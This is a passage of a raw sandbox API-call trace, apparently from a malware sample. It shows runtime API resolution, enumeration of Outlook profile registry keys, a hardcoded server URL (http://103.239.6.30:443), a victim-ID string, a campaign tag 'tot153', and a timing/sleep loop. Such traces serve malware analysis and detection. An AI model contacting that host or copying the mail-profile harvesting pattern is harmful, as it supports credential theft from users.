hHeap=0x560000, dwFlags=0x0, lpMem=0x610840 | out: hHeap=0x560000) returned 1 [0187.024] GetProcessHeap () returned 0x560000 [0187.024] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0187.024] GetProcessHeap () returned 0x560000 [0187.024] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617130 [0187.024] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyA") returned 0x7ffb28a6a960 [0187.024] GetProcessHeap () returned 0x560000 [0187.024] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0187.024] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\e57f6d0b27b6134693ca7113a4ab34a6", phkResult=0x231f578 | out: phkResult=0x231f578*=0x1d0) returned 0x0 [0187.024] GetProcessHeap () returned 0x560000 [0187.024] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617190 [0187.024] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0187.024] GetProcessHeap () returned 0x560000 [0187.024] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617190 | out: hHeap=0x560000) returned 1 [0187.024] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x0, lpName=0x231f6e0, cchName=0x400 | out: lpName="00000003") returned 0x103 [0187.025] GetProcessHeap () returned 0x560000 [0187.025] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617130 [0187.025] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0187.025] GetProcessHeap () returned 0x560000 [0187.025] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0187.025] RegCloseKey (hKey=0x1d0) returned 0x0 [0187.025] GetProcessHeap () returned 0x560000 [0187.025] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x61db80 | out: hHeap=0x560000) returned 1 [0187.025] lstrlenA (lpString="\\") returned 1 [0187.025] GetProcessHeap () returned 0x560000 [0187.025] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617180 [0187.025] lstrcpyA (in: lpString1=0x617180, lpString2="\\" | out: lpString1="\\") returned="\\" [0187.025] GetProcessHeap () returned 0x560000 [0187.025] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x38) returned 0x616b90 [0187.025] GetProcessHeap () returned 0x560000 [0187.025] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616b90, Size=0x71) returned 0x610840 [0187.025] GetProcessHeap () returned 0x560000 [0187.025] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x39) returned 0x616b90 [0187.025] GetProcessHeap () returned 0x560000 [0187.025] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616b90, Size=0xb1) returned 0x61d580 [0187.025] GetProcessHeap () returned 0x560000 [0187.025] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610840 | out: hHeap=0x560000) returned 1 [0187.025] GetProcessHeap () returned 0x560000 [0187.025] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0187.025] GetProcessHeap () returned 0x560000 [0187.025] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x6171c0 [0187.026] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyA") returned 0x7ffb28a6a960 [0187.026] GetProcessHeap () returned 0x560000 [0187.026] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0187.026] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f35c115766b7c94cb080da6869ae8f9d", phkResult=0x231f578 | out: phkResult=0x231f578*=0x1d0) returned 0x0 [0187.026] GetProcessHeap () returned 0x560000 [0187.026] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617130 [0187.026] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0187.026] GetProcessHeap () returned 0x560000 [0187.026] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0187.026] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x0, lpName=0x231f6e0, cchName=0x400 | out: lpName="00000003") returned 0x103 [0187.026] GetProcessHeap () returned 0x560000 [0187.026] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617250 [0187.026] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0187.026] GetProcessHeap () returned 0x560000 [0187.026] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0187.026] RegCloseKey (hKey=0x1d0) returned 0x0 [0187.026] GetProcessHeap () returned 0x560000 [0187.026] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x61d580 | out: hHeap=0x560000) returned 1 [0187.026] lstrlenA (lpString="\\") returned 1 [0187.026] GetProcessHeap () returned 0x560000 [0187.026] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x6171c0 [0187.026] lstrcpyA (in: lpString1=0x6171c0, lpString2="\\" | out: lpString1="\\") returned="\\" [0187.026] GetProcessHeap () returned 0x560000 [0187.026] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x38) returned 0x616b90 [0187.026] GetProcessHeap () returned 0x560000 [0187.026] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616b90, Size=0x71) returned 0x610840 [0187.027] GetProcessHeap () returned 0x560000 [0187.027] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x39) returned 0x616b90 [0187.027] GetProcessHeap () returned 0x560000 [0187.027] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616b90, Size=0xb1) returned 0x61de80 [0187.027] GetProcessHeap () returned 0x560000 [0187.027] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610840 | out: hHeap=0x560000) returned 1 [0187.027] GetProcessHeap () returned 0x560000 [0187.027] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0187.027] GetProcessHeap () returned 0x560000 [0187.027] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617210 [0187.027] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyA") returned 0x7ffb28a6a960 [0187.027] GetProcessHeap () returned 0x560000 [0187.027] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0187.027] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", phkResult=0x231f578 | out: phkResult=0x231f578*=0x1d0) returned 0x0 [0187.027] GetProcessHeap () returned 0x560000 [0187.027] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617250 [0187.027] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0187.027] GetProcessHeap () returned 0x560000 [0187.027] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0187.027] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x0, lpName=0x231f6e0, cchName=0x400 | out: lpName="00000003") returned 0x103 [0187.027] GetProcessHeap () returned 0x560000 [0187.027] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617130 [0187.028] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0187.028] GetProcessHeap () returned 0x560000 [0187.028] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0187.028] RegCloseKey (hKey=0x1d0) returned 0x0 [0187.030] GetProcessHeap () returned 0x560000 [0187.030] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x61de80 | out: hHeap=0x560000) returned 1 [0187.030] GetProcessHeap () returned 0x560000 [0187.030] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6138c0 | out: hHeap=0x560000) returned 1 [0187.030] GetProcessHeap () returned 0x560000 [0187.030] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613920 | out: hHeap=0x560000) returned 1 [0187.030] GetProcessHeap () returned 0x560000 [0187.030] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6139e0 | out: hHeap=0x560000) returned 1 [0187.030] GetProcessHeap () returned 0x560000 [0187.030] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613b00 | out: hHeap=0x560000) returned 1 [0187.031] GetProcessHeap () returned 0x560000 [0187.031] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613710 | out: hHeap=0x560000) returned 1 [0187.031] GetProcessHeap () returned 0x560000 [0187.031] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613650 | out: hHeap=0x560000) returned 1 [0187.031] GetProcessHeap () returned 0x560000 [0187.031] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613800 | out: hHeap=0x560000) returned 1 [0187.031] GetProcessHeap () returned 0x560000 [0187.031] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613a70 | out: hHeap=0x560000) returned 1 [0187.031] GetProcessHeap () returned 0x560000 [0187.031] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6139b0 | out: hHeap=0x560000) returned 1 [0187.031] GetProcessHeap () returned 0x560000 [0187.031] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613c20 | out: hHeap=0x560000) returned 1 [0187.031] GetProcessHeap () returned 0x560000 [0187.031] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613b60 | out: hHeap=0x560000) returned 1 [0187.031] GetProcessHeap () returned 0x560000 [0187.031] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613890 | out: hHeap=0x560000) returned 1 [0187.031] GetProcessHeap () returned 0x560000 [0187.031] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613bf0 | out: hHeap=0x560000) returned 1 [0187.031] GetProcessHeap () returned 0x560000 [0187.031] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613ad0 | out: hHeap=0x560000) returned 1 [0187.031] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x653c00 | out: hHeap=0x560000) returned 1 [0187.031] GetProcessHeap () returned 0x560000 [0187.031] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0187.031] GetProcessHeap () returned 0x560000 [0187.031] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171d0 | out: hHeap=0x560000) returned 1 [0187.031] GetProcessHeap () returned 0x560000 [0187.031] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617270 | out: hHeap=0x560000) returned 1 [0187.031] GetProcessHeap () returned 0x560000 [0187.031] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617080 | out: hHeap=0x560000) returned 1 [0187.031] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x616b10 | out: hHeap=0x560000) returned 1 [0187.031] GetProcessHeap () returned 0x560000 [0187.031] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x616ad0 | out: hHeap=0x560000) returned 1 [0187.031] GetProcessHeap () returned 0x560000 [0187.031] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617120, Size=0x6d) returned 0x610840 [0187.031] GetProcessHeap () returned 0x560000 [0187.031] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x654270 | out: hHeap=0x560000) returned 1 [0187.031] GetProcessHeap () returned 0x560000 [0187.031] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x37) returned 0x616ad0 [0187.032] GetProcessHeap () returned 0x560000 [0187.032] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x37) returned 0x616b10 [0187.032] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10) returned 0x617120 [0187.032] GetProcessHeap () returned 0x560000 [0187.032] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x37) returned 0x616b90 [0187.032] GetProcessHeap () returned 0x560000 [0187.032] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x616b10 | out: hHeap=0x560000) returned 1 [0187.032] GetProcessHeap () returned 0x560000 [0187.032] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x12) returned 0x615f40 [0187.032] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10) returned 0x617190 [0187.032] GetProcessHeap () returned 0x560000 [0187.032] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x37) returned 0x616b10 [0187.032] GetProcessHeap () returned 0x560000 [0187.032] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x40) returned 0x616c90 [0187.032] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x30) returned 0x613440 [0187.032] GetProcessHeap () returned 0x560000 [0187.032] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x36) returned 0x6235d0 [0187.032] GetProcessHeap () returned 0x560000 [0187.032] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x12) returned 0x615d60 [0187.032] GetProcessHeap () returned 0x560000 [0187.032] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617250 [0187.032] GetProcessHeap () returned 0x560000 [0187.032] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x15) returned 0x615ea0 [0187.032] GetProcAddress (hModule=0x7ffb26230000, lpProcName="EnterCriticalSection") returned 0x7ffb28b2e600 [0187.032] GetProcessHeap () returned 0x560000 [0187.032] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x560000) returned 1 [0187.032] GetProcessHeap () returned 0x560000 [0187.032] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617130 [0187.032] GetProcessHeap () returned 0x560000 [0187.032] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x6171c0 [0187.033] GetProcessHeap () returned 0x560000 [0187.033] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617210 [0187.033] lstrlenA (lpString="http://103.239.6.30:443") returned 23 [0187.033] GetProcessHeap () returned 0x560000 [0187.033] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x18) returned 0x615ee0 [0187.033] lstrcpyA (in: lpString1=0x615ee0, lpString2="http://103.239.6.30:443" | out: lpString1="http://103.239.6.30:443") returned="http://103.239.6.30:443" [0187.033] GetProcessHeap () returned 0x560000 [0187.033] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x18) returned 0x615e00 [0187.033] lstrlenA (lpString="XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93") returned 49 [0187.033] GetProcessHeap () returned 0x560000 [0187.033] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x32) returned 0x623550 [0187.033] lstrcpyA (in: lpString1=0x623550, lpString2="XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93" | out: lpString1="XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93") returned="XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93" [0187.033] lstrlenA (lpString="tot153") returned 6 [0187.033] GetProcessHeap () returned 0x560000 [0187.033] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x7) returned 0x617140 [0187.033] lstrcpyA (in: lpString1=0x617140, lpString2="tot153" | out: lpString1="tot153") returned="tot153" [0187.033] GetProcessHeap () returned 0x560000 [0187.033] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617180 [0187.033] GetProcessHeap () returned 0x560000 [0187.033] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xb) returned 0x617270 [0187.033] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="wnsprintfA") returned 0x7ffb262fc9c0 [0187.033] GetProcessHeap () returned 0x560000 [0187.033] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617270 | out: hHeap=0x560000) returned 1 [0187.033] wnsprintfA (in: pszDest=0x231f150, cchDest=13, pszFmt="%d" | out: pszDest="81") returned 2 [0187.033] lstrlenA (lpString="81") returned 2 [0187.033] GetProcessHeap () returned 0x560000 [0187.033] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3) returned 0x617270 [0187.033] lstrcpyA (in: lpString1=0x617270, lpString2="81" | out: lpString1="81") returned="81" [0187.033] GetProcessHeap () returned 0x560000 [0187.033] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3) returned 0x6171d0 [0187.033] GetProcessHeap () returned 0x560000 [0187.034] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x18) returned 0x615ce0 [0187.034] GetProcessHeap () returned 0x560000 [0187.034] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617150 [0187.034] GetProcessHeap () returned 0x560000 [0187.034] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x615ce0, Size=0x31) returned 0x623610 [0187.034] GetProcessHeap () returned 0x560000 [0187.034] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0187.034] GetProcessHeap () returned 0x560000 [0187.034] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x19) returned 0x615ea0 [0187.034] GetProcessHeap () returned 0x560000 [0187.034] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x615ea0, Size=0x3d) returned 0x6236d0 [0187.034] GetProcessHeap () returned 0x560000 [0187.034] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1f) returned 0x615ea0 [0187.034] GetProcessHeap () returned 0x560000 [0187.034] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x6171e0 [0187.034] GetProcessHeap () returned 0x560000 [0187.034] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x615ea0, Size=0x3f) returned 0x623710 [0187.034] GetProcessHeap () returned 0x560000 [0187.034] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0187.034] GetProcessHeap () returned 0x560000 [0187.034] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x20) returned 0x615f60 [0187.034] GetProcessHeap () returned 0x560000 [0187.034] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x615f60, Size=0xa1) returned 0x6108c0 [0187.034] GetProcessHeap () returned 0x560000 [0187.034] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x51) returned 0x6196b0 [0187.037] GetProcessHeap () returned 0x560000 [0187.037] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617080 [0187.037] GetProcessHeap () returned 0x560000 [0187.037] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6196b0, Size=0xa3) returned 0x610980 [0187.037] GetProcessHeap () returned 0x560000 [0187.037] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617080 | out: hHeap=0x560000) returned 1 [0187.037] GetProcessHeap () returned 0x560000 [0187.037] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x52) returned 0x619650 [0187.037] GetProcessHeap () returned 0x560000 [0187.037] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x619650, Size=0xa7) returned 0x653c00 [0187.037] GetProcessHeap () returned 0x560000 [0187.037] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x54) returned 0x6194d0 [0187.037] GetProcessHeap () returned 0x560000 [0187.037] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617150 [0187.037] GetProcessHeap () returned 0x560000 [0187.037] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6194d0, Size=0xa9) returned 0x653cc0 [0187.037] GetProcessHeap () returned 0x560000 [0187.037] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0187.037] GetProcessHeap () returned 0x560000 [0187.037] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x653c00 | out: hHeap=0x560000) returned 1 [0187.037] GetProcessHeap () returned 0x560000 [0187.037] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610980 | out: hHeap=0x560000) returned 1 [0187.037] GetProcessHeap () returned 0x560000 [0187.037] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6108c0 | out: hHeap=0x560000) returned 1 [0187.037] GetProcessHeap () returned 0x560000 [0187.037] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x623710 | out: hHeap=0x560000) returned 1 [0187.037] GetProcessHeap () returned 0x560000 [0187.037] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6236d0 | out: hHeap=0x560000) returned 1 [0187.037] GetProcessHeap () returned 0x560000 [0187.038] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x623610 | out: hHeap=0x560000) returned 1 [0187.038] GetProcessHeap () returned 0x560000 [0187.038] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171d0 | out: hHeap=0x560000) returned 1 [0187.038] GetProcessHeap () returned 0x560000 [0187.038] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617270 | out: hHeap=0x560000) returned 1 [0187.038] GetProcessHeap () returned 0x560000 [0187.038] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0187.038] GetProcessHeap () returned 0x560000 [0187.038] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x623550 | out: hHeap=0x560000) returned 1 [0187.038] GetProcessHeap () returned 0x560000 [0187.038] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x6171d0 [0187.038] GetProcessHeap () returned 0x560000 [0187.038] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1d) returned 0x615ce0 [0187.038] GetProcessHeap () returned 0x560000 [0187.038] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617140 [0187.038] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0187.038] GetProcessHeap () returned 0x560000 [0187.038] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0187.038] GetTickCount () returned 0xe983a9 [0187.038] GetProcessHeap () returned 0x560000 [0187.038] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617160 [0187.038] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0187.038] GetProcessHeap () returned 0x560000 [0187.038] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0187.038] Sleep (dwMilliseconds=0x0) [0187.039] GetProcessHeap () returned 0x560000 [0187.039] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617140 [0187.039] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0187.039] GetProcessHeap () returned 0x560000 [0187.039] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0187.039] GetTickCount () returned 0xe983b9 [0187.039] GetProcessHeap () returned 0x560000 [0187.039] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617140 [0187.039] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0187.039] GetProcessHeap () returned 0x560000 [0187.039] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0187.039] Sleep (dwMilliseconds=0x3) [0187.043] GetProcessHeap () returned 0x560000 [0187.043] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617140 [0187.043] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0187.043] GetProcessHeap () returned 0x560000 [0187.043] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0187.043] GetTickCount () returned 0xe983b9 [0187.043] GetProcessHeap () returned 0x560000 [0187.043] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x6171e0 [0187.043] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0187.043] GetProcessHeap () returned 0x560000 [0187.043] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0187.043] Sleep (dwMilliseconds=0x6) [0187.050] GetProcessHeap () returned 0x560000 [0187.050] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x6171e0 [0187.050] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0187.050] GetProcessHeap () returned 0x560000 [0187.050] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0187.050] GetTickCount () returned 0xe983b9 [0187.050] GetProcessHeap () returned 0x560000 [0187.050] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x6171e0 [0187.050] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0187.055] GetProcessHeap () returned 0x560000 [0187.055] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0187.055] Sleep (dwMilliseconds=0x9) [0187.064] GetProcessHeap () returned 0x560000 [0187.064] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617140 [0187.065] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0187.065] GetProcessHeap () returned 0x560000 [0187.065] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0187.065] GetTickCount () returned 0xe983c9 [0187.065] GetProcessHeap () returned 0x560000 [0187.065] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617270 [0187.065] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0187.065] GetProcessHeap () returned 0x560000 [0187.065] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617270 | out: hHeap=0x560000) returned 1 [0187.065] Sleep (dwMilliseconds=0xc) [0187.080] GetProcessHeap () returned 0x560000 [0187.080] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617270 [0187.081] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0187.081] GetProcessHeap () returned 0x560000 [0187.081] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617270 | out: hHeap=0x560000) returned 1 [0187.081] GetTickCount () returned 0xe983d8 [0187.081] GetProcessHeap () returned 0x560000 [0187.081] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x6171e0 [0187.081] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0187.081] GetProcessHeap () returned 0x560000 [0187.081] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0187.081] Sleep (dwMilliseconds=0xf) [0187.096] GetProcessHeap () returned 0x560000 [0187.096] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617140 [0187.096] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0187.096] GetProcessHeap () returned 0x560000 [0187.097] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0187.097] GetTickCount () returned 0xe983e8 [0187.097] GetProcessHeap () returned 0x560000 [0187.097] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617080 [0187.097] 